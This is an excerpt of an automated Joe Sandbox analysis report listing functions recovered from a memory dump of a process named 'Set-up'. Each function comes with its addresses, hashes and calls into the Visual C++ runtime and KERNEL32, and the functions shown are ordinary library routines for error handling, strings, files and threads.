Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
String ID:
API String ID: 242762301-0
Opcode ID: 5eaa57ed6c967eebdaf29943de6430b157cfd00219722697552ba81e397c0591
Instruction ID: 9020c9e99826ef9c81f1c5703e350e4d7ef22c776c3af36d1ce4e6768b7b3440
Opcode Fuzzy Hash: 5eaa57ed6c967eebdaf29943de6430b157cfd00219722697552ba81e397c0591
Instruction Fuzzy Hash: 15F02D324046B16FD63227B49D0AA6E7B98EF43B707140115F815D30A4DF7AC94297D4

Function 6BB517C4 Relevance: 10.6, APIs: 7, Instructions: 148COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB517DD
_lseek.MSVCR100(00000000,00000000,00000001), ref: 6BB517F5
_errno.MSVCR100 ref: 6BB68D7C
_invalid_parameter_noinfo.MSVCR100 ref: 6BB68D87
_errno.MSVCR100 ref: 6BB68D9C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_fileno_invalid_parameter_noinfo_lseek
String ID:
API String ID: 1667283477-0
Opcode ID: f9c2b5f45e218ddaf48dedfa2bdaf474cb1fa0c084e4aef9647634a2263d282a
Instruction ID: 5cb9dafe62cc3b51662ea492b4cea1c30079e484c11faf80af25b408aba43c12
Opcode Fuzzy Hash: f9c2b5f45e218ddaf48dedfa2bdaf474cb1fa0c084e4aef9647634a2263d282a
Instruction Fuzzy Hash: 5A51D672E043D5AFDB218F68C880B897BB0FF42754F1881A9D9255B281D73CDD61CBA2

Function 6BB4DE57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 6BB6F058
operator+.LIBCMT ref: 6BB6F159

Strings

volatile, xrefs: 6BB6F050, 6BB6F12D
std::nullptr_t, xrefs: 6BB6F113

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Name::operator=operator+
String ID: std::nullptr_t$volatile
API String ID: 1352385710-3726895890
Opcode ID: 36c0ba444f70b6a64b0ceabd462404edf7697e0ecccd67b186216e8bdda191ef
Instruction ID: a0186836bce431083d77661a311397d62f2f1d2ff1680e6dbfb5c9a3f59cff3f
Opcode Fuzzy Hash: 36c0ba444f70b6a64b0ceabd462404edf7697e0ecccd67b186216e8bdda191ef
Instruction Fuzzy Hash: 3741E2728841C9EFDF109FA8D8459BE7B74FF063C4F4040A9E9589B229E7398E41EB51

Function 6BB4B128 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000000,00000001), ref: 6BB4B149
___crtGetStringTypeA.LIBCMT ref: 6BB4B19A
__crtLCMapStringA.MSVCR100(00000000,?,00000100,00000020,00000100,?,00000100,?,00000000,00000000,00000001,00000020,00000100,?,?,?), ref: 6BB4B1BA
__crtLCMapStringA.MSVCR100(00000000,?,00000200,00000020,00000100,?,00000100,?,00000000), ref: 6BB4B1DF

Strings

, xrefs: 6BB4B170

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: String$__crt$InfoType___crt
String ID:
API String ID: 3423027535-3916222277
Opcode ID: 132da714359e8ab487fc90dcc477bbe07e26fdcf6c1950bdc1817c087781f2ed
Instruction ID: dbe4dd150b044a38e6f1eba50a7f4d6667eeb97e91b685c15feb8bb039c2a5a9
Opcode Fuzzy Hash: 132da714359e8ab487fc90dcc477bbe07e26fdcf6c1950bdc1817c087781f2ed
Instruction Fuzzy Hash: E04125704047EC9EDF218B248C85BFB7BFCEB06748F1444E8DA8A86086E2759A459F20

Function 6BB51E41 Relevance: 10.6, APIs: 7, Instructions: 123COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT(00000000,00000000,00000000,00000000,?,6BB573CA,00000000,00000000,00000000,0000003D,?,6BB573E6,74DEDF80,00000000,00000000), ref: 6BB51E57
calloc.MSVCR100(00000001,00000002,00000000,00000000,00000000,00000000,?,6BB573CA,00000000,00000000,00000000,0000003D,?,6BB573E6,74DEDF80,00000000), ref: 6BB51E62
wcscpy_s.MSVCR100(00000000,00000001,00000000,74DEDF80,00000000,00000000), ref: 6BB51E75
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,00000000), ref: 6BB69799
_errno.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,00000000), ref: 6BB697B0
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,00000000), ref: 6BB697BA

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __invoke_watson_errno_invalid_parameter_noinfo_wcslencallocwcscpy_s
String ID:
API String ID: 2624155197-0
Opcode ID: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
Instruction ID: 362a43c877dc0a8e38584bff78ba4fb11e5ad2058036975173fe95364258cae4
Opcode Fuzzy Hash: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
Instruction Fuzzy Hash: 89316B376147D1AAD7151F788C8127B33A0EFC9BA8B9445A5FA648B245F73C8840C393

Function 6BB7880C Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6BB78813
GetCurrentThread.KERNEL32 ref: 6BB7885E

Part of subcall function 6BB7B795: _memset.LIBCMT(?,00000000,0000000C), ref: 6BB7B7A0
Part of subcall function 6BB7B795: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B7A8
Part of subcall function 6BB7B795: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B7B2
Part of subcall function 6BB7B795: GetCurrentProcess.KERNEL32(?,?), ref: 6BB7B7C4
Part of subcall function 6BB7B795: GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB7B7CB

_memset.LIBCMT(00000000,00000000,0000000C,?,6BB82BA8,00000000,?,?,?,?,00000000,00000000), ref: 6BB78899

Part of subcall function 6BB7B7F5: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100(?,?,6BB7899B,00000000,?,?), ref: 6BB7B7FB
Part of subcall function 6BB7B7F5: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100(?,?,6BB7899B,00000000,?,?), ref: 6BB7B805
Part of subcall function 6BB7B7F5: SetThreadAffinityMask.KERNEL32(?,?), ref: 6BB7B814

Part of subcall function 6BB8314F: SetEvent.KERNEL32(?), ref: 6BB83192

EnterCriticalSection.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,6BB7D20F,?,00000000,00000000), ref: 6BB788C7
LeaveCriticalSection.KERNEL32(00000000,?,00000000), ref: 6BB788F3
TlsGetValue.KERNEL32(?,?,00000028,6BB8297A,00000000,?,00000000,?,?,6BB82BA8,00000000,?,?,?,?,00000000), ref: 6BB78915
TlsSetValue.KERNEL32(?,00000000,?,6BB82BA8,00000000,?,?,?,?,00000000,00000000), ref: 6BB78920

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Version@$Concurrency@@Manager@1@Resource$AffinityCriticalCurrentMaskProcessSectionThreadValue_memset$EnterEventH_prolog3_Leave
String ID:
API String ID: 4131446515-0
Opcode ID: 5eda5e45841a3c96863949f05c7f6379a4e9dcd4466df9bf206edfe37131babe
Instruction ID: cc1319623a421e4deea45e74034525947e66fb96e529d59534f2bedc60786e54
Opcode Fuzzy Hash: 5eda5e45841a3c96863949f05c7f6379a4e9dcd4466df9bf206edfe37131babe
Instruction Fuzzy Hash: AA316475A002558FCF14EF60C8C9AAE7BB5FF09314B0950A9EC05AF256DB38E941CFA1

Function 6BB5204F Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

_strnicmp_l.MSVCR100(0000006B,?,0000006B,0000006B,7FFFFFFF,00000000,00000000,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB520A9

Part of subcall function 6BB4EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,0000009B,7FFFFFFF,00000000), ref: 6BB4F052
Part of subcall function 6BB4EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,0000009B,7FFFFFFF,00000000), ref: 6BB4F061

__crtCompareStringA.MSVCR100(0000006B,?,00001001,0000006B,0000006B,?,0000006B,?,7FFFFFFF,00000000,00000000,0000006B,?,0000006B,0000006B), ref: 6BB562B7
_errno.MSVCR100(00000000,00000000,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB6C496
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB6C4A1
_errno.MSVCR100(7FFFFFFF,00000000,00000000,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB6C4BC
_invalid_parameter_noinfo.MSVCR100(7FFFFFFF,00000000,00000000,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB6C4C7
_errno.MSVCR100(?,?,?,?,?,7FFFFFFF,00000000,00000000,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB6C4CE

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_tolower_l$CompareString__crt_strnicmp_l
String ID:
API String ID: 1585791229-0
Opcode ID: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
Instruction ID: 2653b1ee6c47b253f8c1a48459ff4294fe5174b80f4c93880d591a472ad745ba
Opcode Fuzzy Hash: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
Instruction Fuzzy Hash: 4421C1329012D9AFDF21EFB4C881ABD7775FF01364B148295E1305B1A4EB398951DB92

Function 6BB4EFF6 Relevance: 10.6, APIs: 7, Instructions: 81COMMON

Download Yara Rule

APIs

_tolower_l.MSVCR100(00000000,00000000,00000000,0000009B,7FFFFFFF,00000000), ref: 6BB4F052
_tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,0000009B,7FFFFFFF,00000000), ref: 6BB4F061
___ascii_strnicmp.LIBCMT ref: 6BB57686
_errno.MSVCR100(00000000,0000009B,7FFFFFFF,00000000), ref: 6BB6C408
_invalid_parameter_noinfo.MSVCR100(00000000,0000009B,7FFFFFFF,00000000), ref: 6BB6C413
_errno.MSVCR100(00000000,0000009B,7FFFFFFF,00000000), ref: 6BB6C42F
_invalid_parameter_noinfo.MSVCR100(00000000,0000009B,7FFFFFFF,00000000), ref: 6BB6C43A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_tolower_l$___ascii_strnicmp
String ID:
API String ID: 2390777603-0
Opcode ID: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
Instruction ID: 9c2d246a3490cb4eabe15906b520dee6a03e3c6843ed77da59607be6a2562f9b
Opcode Fuzzy Hash: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
Instruction Fuzzy Hash: 0021A2319002D59FDF11DF78C8057BE3BA4FF41264F140699A4745B2D9EB78C905DB51

Function 6BB4AEAE Relevance: 10.6, APIs: 7, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6BB4AEB8
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6BB4AEF6
_malloc_crt.MSVCR100(00000000), ref: 6BB4AF00
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 6BB4AF19
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB4AF24
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB4AF33

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
String ID:
API String ID: 3279498665-0
Opcode ID: 9b680232767679820a1b8a83e9d7ad113e3845586d2a8028432a006587f89f4d
Instruction ID: cffa2971b7f4c3a144b4320ed1d3bc8e30642685bc609deae663d8eb5f2fc755
Opcode Fuzzy Hash: 9b680232767679820a1b8a83e9d7ad113e3845586d2a8028432a006587f89f4d
Instruction Fuzzy Hash: BC1191B2942568BF8B216BB58D888EF7B7CFF467907504462F012D3144D639CD40AAA1

Function 6BB78AC4 Relevance: 10.6, APIs: 7, Instructions: 65threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB78ACB

Part of subcall function 6BB762F7: __EH_prolog3.LIBCMT ref: 6BB762FE
Part of subcall function 6BB762F7: ??2@YAPAXI@Z.MSVCR100 ref: 6BB76366
Part of subcall function 6BB762F7: _memset.LIBCMT(00000000,00000000,B3104C15), ref: 6BB76378

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,6BB80AF2,?,00000001,00000010,6BB80C38,00000000,00000000,6BB80AF2,?,6BB80AF2,?), ref: 6BB78AFB
GetLastError.KERNEL32(?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78B0B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78B23
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000,?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78B31
??2@YAPAXI@Z.MSVCR100(0000001C,5D8B5351,?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78B43
GetCurrentThreadId.KERNEL32 ref: 6BB78B78

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ??2@H_prolog3$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
String ID:
API String ID: 1121080609-0
Opcode ID: f7cdc177f11417cdf48ab35cce3d9f7f9ca21c152f965a785570eb711c73617a
Instruction ID: b99a06d2345fc9da13a6778e47344cd0c6dda0528a06c6e1b8a53d84d00e6165
Opcode Fuzzy Hash: f7cdc177f11417cdf48ab35cce3d9f7f9ca21c152f965a785570eb711c73617a
Instruction Fuzzy Hash: 87218CB1900286AFCB20AF728CC5A9EBBB8FF09354B548579E129DB200C73DD9509B90

Function 6BB4A78A Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCR100(?,?,?,?,6BB4A865,?,6BB4A880,00000010), ref: 6BB4A795
_get_osfhandle.MSVCR100(?), ref: 6BB4A7B8

Part of subcall function 6BB4A745: __doserrno.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB4A780
Part of subcall function 6BB4A745: _errno.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB70432
Part of subcall function 6BB4A745: _invalid_parameter_noinfo.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB7043D

CloseHandle.KERNEL32(00000000), ref: 6BB4A7BF
_get_osfhandle.MSVCR100(00000002), ref: 6BB55A6F
_get_osfhandle.MSVCR100(00000001,00000002), ref: 6BB55A78
GetLastError.KERNEL32 ref: 6BB6F4C2

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
String ID:
API String ID: 1012986785-0
Opcode ID: b7d766e962c1a33dc3688f3e546c74bd8ea782eeb3157c03be095235bb17d870
Instruction ID: c80bd780ba5d204a597260633144180ccfbc14e4f53c7aafaa65f3dbe6d87c81
Opcode Fuzzy Hash: b7d766e962c1a33dc3688f3e546c74bd8ea782eeb3157c03be095235bb17d870
Instruction Fuzzy Hash: 3E1189335452F01ED23216384889B6D3778FF82B78F1500B6E9389B1D4FF6DC842AA51

Function 6BB50338 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB501E4
__doserrno.MSVCR100(6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB702F6
_errno.MSVCR100(6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB702FE
_errno.MSVCR100(6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB70314
_invalid_parameter_noinfo.MSVCR100(6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB7031F
_errno.MSVCR100(6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB70326
__doserrno.MSVCR100(6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB70331

Part of subcall function 6BB4A5A9: EnterCriticalSection.KERNEL32(00000108,6BB4A610,0000000C,6BB5038E,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?), ref: 6BB4A5FA

Part of subcall function 6BB5022F: _isatty.MSVCR100(?,?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002), ref: 6BB502BE
Part of subcall function 6BB5022F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE), ref: 6BB502EF

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
String ID:
API String ID: 3635451409-0
Opcode ID: 503fb96e71e5b1a716e57cd6711cd48c32fab290d4dca35cac157b0cc6b6f94f
Instruction ID: b8a2a4cee4558c0714033106cd85cea16cd23910d19ae9634fe96968b0b9ed8e
Opcode Fuzzy Hash: 503fb96e71e5b1a716e57cd6711cd48c32fab290d4dca35cac157b0cc6b6f94f
Instruction Fuzzy Hash: E9119D728407849FD721AFB4C88275D3B60BF1632DF9102A6E5305B2E1CBBD8A509F66

Function 6BB51712 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB517A8,00000010), ref: 6BB51424
__doserrno.MSVCR100(6BB517A8,00000010), ref: 6BB70398
_errno.MSVCR100(6BB517A8,00000010), ref: 6BB703A0
_errno.MSVCR100(6BB517A8,00000010), ref: 6BB703B6
_invalid_parameter_noinfo.MSVCR100(6BB517A8,00000010), ref: 6BB703C1
_errno.MSVCR100(6BB517A8,00000010), ref: 6BB703C8
__doserrno.MSVCR100(6BB517A8,00000010), ref: 6BB703D3

Part of subcall function 6BB4A5A9: EnterCriticalSection.KERNEL32(00000108,6BB4A610,0000000C,6BB5038E,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?), ref: 6BB4A5FA

Part of subcall function 6BB516B5: _get_osfhandle.MSVCR100(00000000,?,?,6BB4D354,?,00000000,00000000), ref: 6BB516BF
Part of subcall function 6BB516B5: SetFilePointer.KERNEL32(00000000,?,00000000,6BB4D354,00000000,?,?,6BB4D354,?,00000000,00000000), ref: 6BB516D8

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$CriticalEnterFilePointerSection_get_osfhandle_invalid_parameter_noinfo
String ID:
API String ID: 593789910-0
Opcode ID: d97f884ece4be0897ecf3ef6cc818d108f7b2b50ecd1bda6f68df8a02ad73314
Instruction ID: 169c630a6a082daf08f4ce711d5c921ec35daced347d2bf003c2e6858e8ac47e
Opcode Fuzzy Hash: d97f884ece4be0897ecf3ef6cc818d108f7b2b50ecd1bda6f68df8a02ad73314
Instruction Fuzzy Hash: A51190728403D09FD7119FB8C98279D37B0BF01329F594295E5305B1E1CBBD99509F62

Function 6BB78BCC Relevance: 10.5, APIs: 7, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,?,?,?,?,6BB80C55,?,6BB80AF2,?), ref: 6BB78BE8
GetCurrentThread.KERNEL32 ref: 6BB78BEB
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,6BB80C55,?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78BF2
DuplicateHandle.KERNEL32(00000000,?,?,?,?,6BB80C55,?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78BF5
GetLastError.KERNEL32(?,?,?,?,6BB80C55,?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78BFF
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BB80C55,?,6BB80AF2,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB78C17
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000,?,?,?,?,6BB80C55,?,6BB80AF2,?,?,?,?,00000000), ref: 6BB78C25

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

